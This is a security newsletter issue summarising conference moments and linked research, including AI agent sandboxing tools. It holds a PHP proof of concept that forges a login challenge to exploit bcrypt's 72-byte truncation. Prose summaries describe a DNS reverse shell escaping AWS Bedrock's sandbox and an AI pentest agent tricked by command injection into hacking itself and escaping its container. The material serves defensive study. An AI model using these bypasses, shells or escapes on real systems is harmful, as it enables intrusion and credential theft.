
[tl;dr sec] #321 – Sandboxing AI Agents, Trivy Compromised, Pentesting AWS’ AI Pentester


Sandbox approaches by NVIDIA and Niels Provos, moar supply chain compromises, vulnerabilities in AWS Security Agent

I hope you’ve been doing well!

I Will Survive

Phew, stay strong my friends, we're almost through the BSidesSF and RSAC montage.

Too many to list them all, but some quick thoughts and moments that stuck out:

  • Thank you to everyone who came to the inaugural tl;dr sec community meet-up! I had a blast. Also shout-out to Scott Behrens and Travis McPeak for joining me for a fireside chat.

  • Anna Westelius gave an inspiring BSidesSF keynote about reasons for us security folks to be optimistic.

  • It was fun joining my friends Ken Johnson, Seth Law, Kevin McDermott, and Astha Singhal on an Absolute AppSec panel at BSidesSF.

  • Delicious KBBQ with a bunch of other security creator nerds, H/T Ashish and Shilpi of the Cloud Security Podcast for organizing!

  • Huge thanks to Decibel’s Dan Nguyen-Huu and Jon Sakoda for hosting an awesome set of lightning talks, which my bud Daniel Miessler also helped organize. Great talks from Rob Ragan, Jackie Bow, Andrew Becherer, and Sydney Marrone!

  • Randomly meeting former NSA Director Rob Joyce! H/T Lina Lau, whose company is working on some impactful stuff.

  • Hearing from folks who were moved by my talk last BSidesSF about vulnerability. This had the biggest impact on me.

Security creator friends!

AI adoption is accelerating across cloud environments, from LLMs to autonomous agents and complex data pipelines. But without dedicated AI security posture management (AI-SPM), these innovations introduce a new class of risks that traditional tools can’t address.

From exposed training data to overprivileged AI agents, the attack surface is expanding faster than security teams can keep up.

Download the guide to learn a five-step framework to gain visibility, assess risk and secure AI across your cloud environment.

Having visibility into the AI usage in your environment is important, and unfortunately not always easy. I hear from lots of security leaders working on securing AI usage these days.

AppSec

ChiChou/vscode-frida
A VSCode extension providing a comprehensive IDE for Frida dynamic instrumentation, featuring a sidebar for listing apps/processes on local/USB/remote devices, interactive panels for browsing modules/exports and classes/methods (Java/Objective-C), and one-click hook generation for native functions, ObjC selectors, and Java methods.

How “Strengthening Crypto” Broke Authentication: FreshRSS and bcrypt’s 72-Byte Limit
Pentester Lab's Louis Nyffenegger analyzes CVE-2025-68402, an authentication bypass in the development branch of FreshRSS, a self-hosted RSS aggregator, caused by a "strengthen crypto" commit that replaced SHA-1 (40 hex chars) with SHA-256 (64 hex chars) for nonce generation. The longer nonce, when concatenated in front of the stored bcrypt hash before verification, pushed the password-dependent portion of that hash beyond bcrypt's 72-byte truncation limit: 64 nonce bytes plus the algorithm identifier ($2y$10$, 7 bytes) plus one salt character already fill all 72 bytes, so password_verify() effectively checked only values that do not depend on the actual password.

“A commit meant to strengthen the crypto ended up removing the need for a valid password.”  
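To make the 72-byte behavior concrete, the following is an added PHP illustration, not FreshRSS's own code. It reduces the challenge/response flow to the pattern described above (client sends bcrypt(nonce . storedHash), server runs password_verify() over the same concatenation); the sample password, the nonces, and the forged hash are constructed for the demonstration, and the pre-hashing remedy at the end is this editor's suggestion rather than the project's fix.

```php
<?php
// Added illustration, not FreshRSS code. The challenge/response is simplified
// to the pattern in the write-up: the client is expected to send
// bcrypt($nonce . $stored) and the server checks password_verify() over the
// same concatenation. bcrypt hashes only the first 72 bytes of its input.

const BCRYPT_OPTS = ['cost' => 10];   // keeps the "$2y$10$" prefix from the write-up

// Server side: stored credential for a constructed sample password.
// Layout: "$2y$10$" (7 bytes) + 22 salt bytes + 31 hash bytes = 60 bytes.
$stored = password_hash('correct horse battery staple', PASSWORD_BCRYPT, BCRYPT_OPTS);

// Attacker side: keep the algorithm prefix plus the first salt byte (at most 64
// guesses) and replace every later byte with one guaranteed to differ from the
// real hash, so the attacker provably knows nothing password-dependent.
$forged = substr($stored, 0, 8);
for ($i = 8; $i < strlen($stored); $i++) {
    $forged .= ($stored[$i] === 'X') ? 'Y' : 'X';
}

function server_verify(string $nonce, string $stored, string $challenge): bool
{
    // The vulnerable ordering: nonce first, password-derived hash second.
    return password_verify($nonce . $stored, $challenge);
}

function attacker_challenge(string $nonce, string $forged): string
{
    // Built without the real hash; only the prefix and first salt byte are right.
    return password_hash($nonce . $forged, PASSWORD_BCRYPT, BCRYPT_OPTS);
}

function password_bytes_checked(int $nonceLen): int
{
    // How many of the 31 password-dependent hash bytes land inside bcrypt's
    // 72-byte window when the nonce is $nonceLen bytes long.
    return max(0, min(31, 72 - $nonceLen - 7 - 22));
}

// SHA-1-sized nonce (40 hex chars): 3 password-dependent bytes are still
// hashed, so the forged challenge is rejected.
$nonce40 = str_repeat('a', 40);
printf("nonce=40 bytes, password bytes checked=%d, forged accepted=%s\n",
    password_bytes_checked(40),
    server_verify($nonce40, $stored, attacker_challenge($nonce40, $forged)) ? 'yes' : 'no');

// SHA-256-sized nonce (64 hex chars): 64 + 7 + 1 = 72, the window closes after
// the first salt byte, and the forged challenge is accepted.
$nonce64 = str_repeat('a', 64);
printf("nonce=64 bytes, password bytes checked=%d, forged accepted=%s\n",
    password_bytes_checked(64),
    server_verify($nonce64, $stored, attacker_challenge($nonce64, $forged)) ? 'yes' : 'no');

// Note that even the 40-byte case only covers 3 of the 31 hash bytes. One way
// to make the check robust (editor's suggestion) is to keep the bcrypt input
// fixed-length and under 72 bytes by pre-hashing, e.g. both sides computing
// bcrypt over hash('sha256', $nonce . $stored), a 64-byte hex digest, so every
// byte of the nonce and of the stored hash influences what bcrypt sees.
```

Run it with `php bcrypt_window.php`; the first line reports the forged challenge as rejected and the second as accepted. The `password_bytes_checked()` helper is the quick audit you can apply to any bcrypt(prefix . secret) construction: if the secret's bytes start at or after offset 72, the password has dropped out of the check entirely.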

The browser runtime sits between your website and your customers, bots, AI agents, and fraudsters. No one is watching it. And agents now access websites on behalf of humans, adding the risk of consumer agents being manipulated by script injections from third-party code. Grab this report to see data on: the new threat of locally hosted stealth browsers, a 15x rise in user-action AI agents, a 275% increase in discussions of bot traffic, and results of an industry survey on how practitioners are preparing against AI-agent-driven website fraud.

I could definitely see the bar rising for preventing AI-agent-driven fraud or bot abuse given improvements in AI + browser use. I'm curious how we secure this new world.

Cloud Security

IAMTrail
AWS silently updates managed IAM policies all the time. This project by Victor Grenu tracks the full version history and diffs of 1,525 AWS managed IAM policies, archived since 2019.

Pwning AI Code Interpreters in AWS Bedrock AgentCore
Friend of the newsletter Kinnaird McQuade (BeyondTrust) discovered that the AWS Bedrock AgentCore Code Interpreter's Sandbox network mode, documented as "complete isolation with no external access", still allows public DNS queries. The post walks through using that capability to establish bidirectional command and control (C2) over a custom tunneling protocol carried in DNS queries and responses, obtaining a full interactive reverse shell, exfiltrating data, and executing commands with the Code Interpreter's IAM role. GitHub PoC.

Result: “AWS communicated that a fix will not be made and it will change the documentation’s description of sandbox mode instead. AWS awarded the security researcher with a $100 gift card to the AWS Gear Shop.”

This post actually had a pretty good amount of details and context, nice. I also found it interesting how performance dropped when using an LLM with a knowledge cutoff before the CVE Bench release. Is it doing better due to "memorizing" the answers, or is it just a worse model because it's older?

  1. The DNS confusion bug allowed attackers to manipulate Route53 private hosted zones to trick the agent into pentesting public domains they don’t own by exploiting the “Unreachable” domain status and DNS record verification timing.

  2. Richard was able to trick the agent into hacking itself, obtaining a reverse shell with root access to the agent sandbox by injecting commands into debug messages, and escaping the container through the mounted /run/docker.sock to access the host EC2 instance and its IAM role credentials.

  3. He found the agent sometimes performs unnecessarily destructive actions like using DROP TABLE for SQL injection probes.

  4. The agent can expose unredacted passwords in pentest reports.

Supply Chain

Something like this makes a lot of sense to me. We should be taking all of the lessons we’ve learned over time from various package registries and language ecosystems and ideally building them in from the beginning with new things like Skills.

Blue Team

mandiant/speakeasy
By Mandiant: A Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime instead of a full VM. It emulates APIs, process/thread behavior, filesystem, registry, and network activity so samples can keep moving through realistic execution paths.

FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
Ctrl-Alt-Intel discovered an exposed open directory on a FancyBear (APT28/GRU) C2 server that revealed the group's complete toolkit, telemetry logs, and exfiltrated data from a 500+ day espionage campaign targeting government and military entities across Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. The exposed server contained 2,800+ exfiltrated emails, 240+ credential sets with TOTP 2FA secrets, and more.

“FancyBear developed a modular, multi-platform exploitation toolkit where a victim simply opening a malicious email – with no further clicks – could result in their credentials stolen, their 2FA bypassed, emails within their mailbox exfiltrated, and a silent forwarding rule established that persists indefinitely.”

Red Team

Islands of Invariance
Rasta Mouse (maybe Rasta Mouse on X, Daniel Duggan?) describes how Crystal Palace now includes an automatic YARA generator that creates signatures based on “islands of invariance” (predictable, unchanged code patterns after optimization).

A scalpel, a hammer, and a foot gun
Raphael Mudge has released ised, a program rewriting tool for Crystal Palace that surgically inserts or replaces code at instruction pattern matches to break content signatures. The tool uses a two-pass implementation with prepend/append/replace buckets and supports specific/generic/mnemonic pattern matching from Crystal Palace’s disassembler output.

“A potential outcome is that researchers building tools on this platform may feel quite comfortable releasing Yara rules for all of their capability. It’s no loss, because they and their users would likely have a private ised-cocktail ready to go. What would change in red teaming (or cybersecurity even), if there was no fear of ‘burning a tool’ because of its content tells and behavior was the only meaningful battleground?”

ghostvectoracademy/DLLHijackHunter
By GhostVector Academy: An automated Windows DLL hijacking detection tool that discovers, validates, and confirms exploitable DLL hijack opportunities through a four-phase pipeline: discovery (enumerates binaries across services, scheduled tasks, startup items, COM objects, and AutoElevate UAC bypass vectors), filtration (eliminates false positives through hard and soft gates), canary confirmation (deploys a harmless canary DLL and triggers the binary to prove the hijack works), and scoring (0-100% confidence plus 0-10 impact score based on privilege gained, trigger reliability, and stealth).

AI + Security

NVIDIA/NemoClaw
An open source reference stack that simplifies running OpenClaw agents inside NVIDIA OpenShell sandboxes with multi-layer security controls including Landlock, seccomp, network namespaces, and policy-enforced egress filtering. More below.

NVIDIA/OpenShell
OpenShell provides a sandboxed execution environment for AI agents that enforces declarative YAML policies to prevent unauthorized file access, data exfiltration, and uncontrolled network activity. The system runs as a K3s cluster inside a single Docker container and applies defense-in-depth across four policy domains: filesystem (read/write restrictions), network (outbound connection control with HTTP method and path-level enforcement), process (privilege escalation blocking), and inference (model API call routing).

OpenShell supports Claude, OpenCode, Codex, OpenClaw, and Ollama agents out of the box and manages credentials as injectable providers that never touch the sandbox filesystem. Security policies are hot-reloadable at runtime for the network and inference layers, while filesystem and process restrictions are locked at sandbox creation.

IronCurtain funnels all actions through a single MCP proxy chokepoint where a policy engine enforces rules written in plain English and compiled to deterministic policies. The system supports two sandbox modes: Code Mode runs LLM-generated TypeScript in isolated V8 with no filesystem/network access, while Docker Mode runs full agents like Claude Code CLI in containers with --network=none where a MITM proxy swaps fake API keys for real ones to maintain credential separation.

The plain-English constitution approach (inspired by Microsoft Research’s LEGALEASE) lets users write policies like “agent may read/write files in project directory but must ask before git push” which compile to deterministic allow/deny/escalate rules, with an optional auto-approver that recognizes explicit user intent to reduce alert fatigue.

Really thoughtful, great read. I love the architecture of making sure there’s a single security enforcement point, and how you can ease the burden of writing complex enforcement policies via natural language (but that are still enforced deterministically).

Misc

Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate it if you'd forward it to them.

P.S. Feel free to connect with me on LinkedIn.




